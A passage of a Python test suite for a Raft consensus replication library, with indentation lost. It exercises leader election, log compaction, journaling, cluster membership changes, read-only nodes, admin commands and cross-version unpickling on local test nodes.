assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
doTicks(objs, 1.0)
assert o3._getLeader() is None
o1._destroy()
o2._destroy()
o3._destroy()
def _checkSameLeader(objs):
for obj1 in objs:
l1 = obj1._getLeader()
if l1 != obj1._SyncObj__selfNode:
continue
t1 = obj1._getTerm()
for obj2 in objs:
l2 = obj2._getLeader()
if l2 != obj2._SyncObj__selfNode:
continue
if obj2._getTerm() != t1:
continue
if l2 != l1:
obj1._printStatus()
obj2._printStatus()
return False
return True
def _checkSameLeader2(objs):
for obj1 in objs:
l1 = obj1._getLeader()
if l1 is None:
continue
t1 = obj1._getTerm()
for obj2 in objs:
l2 = obj2._getLeader()
if l2 is None:
continue
if obj2._getTerm() != t1:
continue
if l2 != l1:
obj1._printStatus()
obj2._printStatus()
return False
return True
def test_randomTest1():
journalFiles = [getNextJournalFile(), getNextJournalFile(), getNextJournalFile()]
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.RAND_1, journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.RAND_1, journalFile=journalFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.RAND_1, journalFile=journalFiles[2])
objs = [o1, o2, o3]
st = time.time()
while time.time() - st < 120.0:
doTicks(objs, random.random() * 0.3, interval=0.05)
assert _checkSameLeader(objs)
assert _checkSameLeader2(objs)
for i in xrange(0, random.randint(0, 2)):
random.choice(objs).addValue(random.randint(0, 10))
newObjs = list(objs)
newObjs.pop(random.randint(0, len(newObjs) - 1))
doTicks(newObjs, random.random() * 0.3, interval=0.05)
assert _checkSameLeader(objs)
assert _checkSameLeader2(objs)
for i in xrange(0, random.randint(0, 2)):
random.choice(objs).addValue(random.randint(0, 10))
if not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter())
st = time.time()
while not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
doTicks(objs, 2.0, interval=0.05)
if time.time() - st > 30:
break
if not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
o1._printStatus()
o2._printStatus()
o3._printStatus()
print('Logs same:', o1._SyncObj__raftLog == o2._SyncObj__raftLog == o3._SyncObj__raftLog)
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter())
raise AssertionError('Values not equal')
counter = o1.getCounter()
o1._destroy()
o2._destroy()
o3._destroy()
del o1
del o2
del o3
time.sleep(0.1)
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.RAND_1, journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.RAND_1, journalFile=journalFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.RAND_1, journalFile=journalFiles[2])
objs = [o1, o2, o3]
st = time.time()
while not (o1.getCounter() == o2.getCounter() == o3.getCounter() == counter):
doTicks(objs, 2.0, interval=0.05)
if time.time() - st > 30:
break
if not (o1.getCounter() == o2.getCounter() == o3.getCounter() >= counter):
o1._printStatus()
o2._printStatus()
o3._printStatus()
print('Logs same:', o1._SyncObj__raftLog == o2._SyncObj__raftLog == o3._SyncObj__raftLog)
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter(), counter)
raise AssertionError('Values not equal')
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
# Ensure that raftLog after serialization is the same as in serialized data
def test_logCompactionRegressionTest1():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1._forceLogCompaction()
doTicks(objs, 0.5)
assert o1._SyncObj__forceLogCompaction == False
logAfterCompaction = o1._SyncObj__raftLog
o1._SyncObj__loadDumpFile(True)
logAfterDeserialize = o1._SyncObj__raftLog
assert logAfterCompaction == logAfterDeserialize
o1._destroy()
o2._destroy()
def test_logCompactionRegressionTest2():
dumpFiles = [getNextDumpFile(), getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], dumpFile=dumpFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], dumpFile=dumpFiles[2])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
objs = [o1, o2, o3]
o1.addValue(2)
o1.addValue(3)
doTicks(objs, 10, stopFunc=lambda: o3.getCounter() == 5)
o3._forceLogCompaction()
doTicks(objs, 0.5)
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader() == o3._getLeader()
o3._destroy()
objs = [o1, o2]
o1.addValue(2)
o1.addValue(3)
doTicks(objs, 0.5)
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 0.5)
o3 = TestObj(a[2], [a[0], a[1]], dumpFile=dumpFiles[2])
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1._destroy()
o2._destroy()
o3._destroy()
removeFiles(dumpFiles)
def __checkParnerNodeExists(obj, nodeAddr, shouldExist=True):
nodeAddrSet = {node.address for node in obj._SyncObj__otherNodes}
return (
nodeAddr in nodeAddrSet) == shouldExist # either nodeAddr is in nodeAddrSet and shouldExist is True, or nodeAddr isn't in the set and shouldExist is False
def test_doChangeClusterUT1():
dumpFiles = [getNextDumpFile()]
removeFiles(dumpFiles)
baseAddr = getNextAddr()
oterAddr = getNextAddr()
o1 = TestObj(baseAddr, ['localhost:1235', oterAddr], dumpFile=dumpFiles[0], dynamicMembershipChange=True)
__checkParnerNodeExists(o1, 'localhost:1238', False)
__checkParnerNodeExists(o1, 'localhost:1239', False)
__checkParnerNodeExists(o1, 'localhost:1235', True)
noop = _bchr(_COMMAND_TYPE.NO_OP)
member = _bchr(_COMMAND_TYPE.MEMBERSHIP)
# Check regular configuration change - adding
o1._SyncObj__onMessageReceived(TCPNode('localhost:12345'), {
'type': 'append_entries',
'term': 1,
'prevLogIdx': 1,
'prevLogTerm': 0,
'commit_index': 2,
'entries': [(noop, 2, 1), (noop, 3, 1), (member + pickle.dumps(['add', 'localhost:1238']), 4, 1)]
})
__checkParnerNodeExists(o1, 'localhost:1238', True)
__checkParnerNodeExists(o1, 'localhost:1239', False)
# Check rollback adding
o1._SyncObj__onMessageReceived(TCPNode('localhost:1236'), {
'type': 'append_entries',
'term': 2,
'prevLogIdx': 2,
'prevLogTerm': 1,
'commit_index': 3,
'entries': [(noop, 3, 2), (member + pickle.dumps(['add', 'localhost:1239']), 4, 2)]
})
__checkParnerNodeExists(o1, 'localhost:1238', False)
__checkParnerNodeExists(o1, 'localhost:1239', True)
__checkParnerNodeExists(o1, oterAddr, True)
# Check regular configuration change - removing
o1._SyncObj__onMessageReceived(TCPNode('localhost:1236'), {
'type': 'append_entries',
'term': 2,
'prevLogIdx': 4,
'prevLogTerm': 2,
'commit_index': 4,
'entries': [(member + pickle.dumps(['rem', 'localhost:1235']), 5, 2)]
})
__checkParnerNodeExists(o1, 'localhost:1238', False)
__checkParnerNodeExists(o1, 'localhost:1239', True)
__checkParnerNodeExists(o1, 'localhost:1235', False)
# Check log compaction
o1._forceLogCompaction()
doTicks([o1], 0.5)
o1._destroy()
o2 = TestObj(oterAddr, [baseAddr, 'localhost:1236'], dumpFile='dump1.bin', dynamicMembershipChange=True)
doTicks([o2], 0.5)
__checkParnerNodeExists(o2, oterAddr, False)
__checkParnerNodeExists(o2, baseAddr, True)
__checkParnerNodeExists(o2, 'localhost:1238', False)
__checkParnerNodeExists(o2, 'localhost:1239', True)
__checkParnerNodeExists(o2, 'localhost:1235', False)
o2._destroy()
removeFiles(dumpFiles)
def test_doChangeClusterUT2():
a = [getNextAddr(), getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[2], a[0]], dynamicMembershipChange=True)
o3 = TestObj(a[2], [a[0], a[1]], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady() == o2._isReady() == o3._isReady() == True
o3.addValue(50)
o2.addNodeToCluster(a[3])
success = False
for i in xrange(10):
doTicks([o1, o2, o3], 0.5)
res = True
res &= __checkParnerNodeExists(o1, a[3], True)
res &= __checkParnerNodeExists(o2, a[3], True)
res &= __checkParnerNodeExists(o3, a[3], True)
if res:
success = True
break
o2.addNodeToCluster(a[3])
assert success
o4 = TestObj(a[3], [a[0], a[1], a[2]], dynamicMembershipChange=True)
doTicks([o1, o2, o3, o4], 10, stopFunc=lambda: o4._isReady())
o1.addValue(450)
doTicks([o1, o2, o3, o4], 10, stopFunc=lambda: o4.getCounter() == 500)
assert o4.getCounter() == 500
o1._destroy()
o2._destroy()
o3._destroy()
o4._destroy()
def test_journalTest1():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and \
o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1.addValue(100)
o2.addValue(150)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 600 and o2.getCounter() == 600)
assert o1.getCounter() == 600
assert o2.getCounter() == 600
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 0.5)
o1.addValue(150)
o2.addValue(150)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 900 and o2.getCounter() == 900)
assert o1.getCounter() == 900
assert o2.getCounter() == 900
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and \
o1.getCounter() == 900 and o2.getCounter() == 900)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 900
assert o2.getCounter() == 900
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_journalTest2():
journalFiles = [getNextJournalFile()]
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
removeFiles(journalFiles)
journal = createJournal(journalFiles[0])
journal.add(b'cmd1', 1, 0)
journal.add(b'cmd2', 2, 0)
journal.add(b'cmd3', 3, 0)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 3
assert journal[0] == (b'cmd1', 1, 0)
assert journal[-1] == (b'cmd3', 3, 0)
journal.deleteEntriesFrom(2)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 2
assert journal[0] == (b'cmd1', 1, 0)
assert journal[-1] == (b'cmd2', 2, 0)
journal.deleteEntriesTo(1)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 1
assert journal[0] == (b'cmd2', 2, 0)
journal._destroy()
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_applyJournalAfterRestart():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
doTicks(objs, 2)
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
objs = [o1]
doTicks(objs, 10, o1.getCounter() == 350)
assert o1.getCounter() == 350
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_autoTick1():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.AUTO_TICK_1)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.AUTO_TICK_1)
assert not o1._isReady()
assert not o2._isReady()
time.sleep(4.5)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
time.sleep(1.5)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
assert o2.addValueSync(10) == 360
assert o1.addValueSync(20) == 380
o1._destroy()
o2._destroy()
time.sleep(0.5)
def test_largeCommands():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[0], leaderFallbackTimeout=60.0)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[1], leaderFallbackTimeout=60.0)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
# Generate ~20Mb data.
testRandStr = getRandStr()
bigStr = ''
for i in xrange(0, 200):
bigStr += getRandStr()
o1.addKeyValue('big', bigStr)
o1.addKeyValue('test', testRandStr)
# Wait for replication.
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr and \
o1.getValue('big') == bigStr and \
o2.getValue('big') == bigStr)
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
o1._forceLogCompaction()
o2._forceLogCompaction()
# Wait for disk dump
doTicks(objs, 8.0)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[0], leaderFallbackTimeout=60.0)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[1], leaderFallbackTimeout=60.0)
objs = [o1, o2]
# Wait for disk load, election and replication
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr and \
o1.getValue('big') == bigStr and \
o2.getValue('big') == bigStr and \
o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_readOnlyNodes():
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], password='123')
o2 = TestObj(a[1], [a[2], a[0]], password='123')
o3 = TestObj(a[2], [a[0], a[1]], password='123')
objs = [o1, o2, o3]
b1 = TestObj(None, [a[0], a[1], a[2]], password='123')
b2 = TestObj(None, [a[0], a[1], a[2]], password='123')
roObjs = [b1, b2]
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o3.getCounter() == 350)
doTicks(objs + roObjs, 4.0, stopFunc=lambda: b1.getCounter() == 350 and b2.getCounter() == 350)
assert b1.getCounter() == b2.getCounter() == 350
assert o1._getLeader() == b1._getLeader() == o2._getLeader() == b2._getLeader()
assert b1._getLeader().address in a
prevLeader = o1._getLeader()
newObjs = [o for o in objs if o._SyncObj__selfNode != prevLeader]
assert len(newObjs) == 2
doTicks(newObjs + roObjs, 10.0, stopFunc=lambda: newObjs[0]._getLeader() != prevLeader and \
newObjs[0]._getLeader() is not None and \
newObjs[0]._getLeader().address in a and \
newObjs[0]._getLeader() == newObjs[1]._getLeader())
assert newObjs[0]._getLeader() != prevLeader
assert newObjs[0]._getLeader().address in a
assert newObjs[0]._getLeader() == newObjs[1]._getLeader()
newObjs[1].addValue(50)
doTicks(newObjs + roObjs, 10.0, stopFunc=lambda: newObjs[0].getCounter() == 400 and b1.getCounter() == 400)
o1._printStatus()
o2._printStatus()
o3._printStatus()
b1._printStatus()
assert newObjs[0].getCounter() == 400
assert b1.getCounter() == 400
doTicks(objs + roObjs, 10.0,
stopFunc=lambda: sum([int(o.getCounter() == 400) for o in objs + roObjs]) == len(objs + roObjs))
for o in objs + roObjs:
assert o.getCounter() == 400
currRes = {}
def onAdd(res, err):
currRes[0] = err
b1.addValue(50, callback=onAdd)
doTicks(objs + roObjs, 5.0, stopFunc=lambda: o1.getCounter() == 450 and \
b1.getCounter() == 450 and \
b2.getCounter() == 450 and
currRes.get(0) == FAIL_REASON.SUCCESS)
assert o1.getCounter() == 450
assert b1.getCounter() == 450
assert b2.getCounter() == 450
assert currRes.get(0) == FAIL_REASON.SUCCESS
# check that all objects have 2 readonly nodes
assert all(map(lambda o: o.getStatus()['readonly_nodes_count'] == 2, objs))
# disconnect readonly node
b1._destroy()
doTicks(objs, 2.0)
assert all(map(lambda o: o.getStatus()['readonly_nodes_count'] == 1, objs))
o1._destroy()
o2._destroy()
o3._destroy()
b1._destroy()
b2._destroy()
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_syncobjAdminStatus():
assert HAS_CRYPTO
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], password='123')
o2 = TestObj(a[1], [a[0]], password='123')
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
status1 = o1.getStatus()
status2 = o2.getStatus()
assert 'version' in status1
assert 'log_len' in status2
trueRes = {
o1: '\n'.join('%s: %s' % (k, v) for k, v in sorted(status1.items())),
o2: '\n'.join('%s: %s' % (k, v) for k, v in sorted(status2.items())),
}
currRes = {
}
args = {
o1: ['-conn', a[0], '-pass', '123', '-status'],
o2: ['-conn', a[1], '-pass', '123', '-status'],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes,
stopFunc=lambda: currRes.get(o1) is not None and currRes.get(o2) is not None)
assert len(currRes[o1]) == len(trueRes[o1])
assert len(currRes[o2]) == len(trueRes[o2])
o1._destroy()
o2._destroy()
def test_syncobjAdminAddRemove():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], dynamicMembershipChange=True)
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
trueRes = 'SUCCESS ADD ' + a[2]
currRes = {}
args = {
o1: ['-conn', a[0], '-add', a[2]],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
o3 = TestObj(a[2], [a[1], a[0]], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
trueRes = 'SUCCESS REMOVE ' + a[2]
args[o1] = None
args[o2] = ['-conn', a[1], '-remove', a[2]]
doSyncObjAdminTicks([o1, o2, o3], args, 10.0, currRes, stopFunc=lambda: currRes.get(o2) is not None)
assert currRes[o2] == trueRes
o3._destroy()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
o1._destroy()
o2._destroy()
def test_journalWithAddNodes():
dumpFiles = [getNextDumpFile(), getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1], dynamicMembershipChange=True)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
doTicks(objs, 2)
trueRes = 'SUCCESS ADD ' + a[2]
currRes = {}
args = {
o1: ['-conn', a[0], '-add', a[2]],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
o3 = TestObj(a[2], [a[1], a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[2], journalFile=journalFiles[2], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o3.getCounter() == 350
doTicks(objs, 2)
o1._destroy()
o2._destroy()
o3._destroy()
removeFiles(dumpFiles)
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1], dynamicMembershipChange=True)
o3 = TestObj(a[2], [a[1], a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[2], journalFile=journalFiles[2], dynamicMembershipChange=True)
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o1.getCounter() == 350 and o3._isReady() and o3.getCounter() == 350)
assert o1._isReady()
assert o3._isReady()
assert o1.getCounter() == 350
assert o3.getCounter() == 350
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 550 and o3.getCounter() == 550)
assert o1.getCounter() == 550
assert o3.getCounter() == 550
o1._destroy()
o2._destroy()
o3._destroy()
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_syncobjAdminSetVersion():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], dynamicMembershipChange=True)
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1.getCodeVersion() == 0
assert o2.getCodeVersion() == 0
o2.testMethod()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getValue('testKey') == 'valueVer1' and \
o2.getValue('testKey') == 'valueVer1')
assert o1.getValue('testKey') == 'valueVer1'
assert o2.getValue('testKey') == 'valueVer1'
trueRes = 'SUCCESS SET_VERSION 1'
currRes = {}
args = {
o1: ['-conn', a[0], '-set_version', '1'],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getCodeVersion() == 1 and o2.getCodeVersion() == 1)
assert o1.getCodeVersion() == 1
assert o2.getCodeVersion() == 1
o2.testMethod()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getValue('testKey') == 'valueVer2' and \
o2.getValue('testKey') == 'valueVer2')
assert o1.getValue('testKey') == 'valueVer2'
assert o2.getValue('testKey') == 'valueVer2'
o1._destroy()
o2._destroy()
@pytest.mark.skipif(os.name == 'nt', reason='temporary disabled for windows')
def test_syncobjWaitBinded():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], testType=TEST_TYPE.WAIT_BIND)
o2 = TestObj(a[1], [a[0]], testType=TEST_TYPE.WAIT_BIND)
o1.waitBinded()
o2.waitBinded()
o3 = TestObj(a[1], [a[0]], testType=TEST_TYPE.WAIT_BIND)
with pytest.raises(SyncObjException):
o3.waitBinded()
o1.destroy()
o2.destroy()
o3.destroy()
@pytest.mark.skipif(os.name == 'nt', reason='temporary disabled for windows')
def test_unpickle():
data = {'foo': 'bar', 'command': b'\xfa', 'entries': [b'\xfb', b'\xfc']}
python2_cpickle = b'\x80\x02}q\x01(U\x03fooq\x02U\x03barq\x03U\x07commandq\x04U\x01\xfaU\x07entriesq\x05]q\x06(U\x01\xfbU\x01\xfceu.'
python2_pickle = b'\x80\x02}q\x00(U\x03fooq\x01U\x03barq\x02U\x07commandq\x03U\x01\xfaq\x04U\x07entriesq\x05]q\x06(U\x01\xfbq\x07U\x01\xfcq\x08eu.'
python3_pickle = b'\x80\x02}q\x00(X\x03\x00\x00\x00fooq\x01X\x03\x00\x00\x00barq\x02X\x07\x00\x00\x00commandq\x03c_codecs\nencode\nq\x04X\x02\x00\x00\x00\xc3\xbaq\x05X\x06\x00\x00\x00latin1q\x06\x86q\x07Rq\x08X\x07\x00\x00\x00entriesq\t]q\n(h\x04X\x02\x00\x00\x00\xc3\xbbq\x0bh\x06\x86q\x0cRq\rh\x04X\x02\x00\x00\x00\xc3\xbcq\x0eh\x06\x86q\x0fRq\x10eu.'
python2_cpickle_data = pickle.loads(python2_cpickle)
assert data == python2_cpickle_data, 'Failed to unpickle data pickled by python2 cPickle'
python2_pickle_data = pickle.loads(python2_pickle)
assert data == python2_pickle_data, 'Failed to unpickle data pickled by python2 pickle'
python3_pickle_data = pickle.loads(python3_pickle)
assert data == python3_pickle_data, 'Failed to unpickle data pickled by python3 pickle'
class TestConsumer1(SyncObjConsumer):
def __init__(self):
super(TestConsumer1, self).__init__()
self.__counter = 0
@replicated
def add(self, value):
self.__counter += value
@replicated
def set(self, value):
self.__counter = value
def get(self):
return self.__counter
class TestConsumer2(SyncObjConsumer):
def __init__(self):
super(TestConsumer2, self).__init__()
self.__values = {}
@replicated
def set(self, key, value):
self.__values[key] = value
def get(self, key):
return self.__values.get(key)
def test_consumers():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
c11 = TestConsumer1()
c12 = TestConsumer1()
c13 = TestConsumer2()
c21 = TestConsumer1()
c22 = TestConsumer1()
c23 = TestConsumer2()
c31 = TestConsumer1()
c32 = TestConsumer1()
c33 = TestConsumer2()
o1 = TestObj(a[0], [a[1], a[2]], consumers=[c11, c12, c13])
o2 = TestObj(a[1], [a[0], a[2]], consumers=[c21, c22, c23])
o3 = TestObj(a[2], [a[0], a[1]], consumers=[c31, c32, c33])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
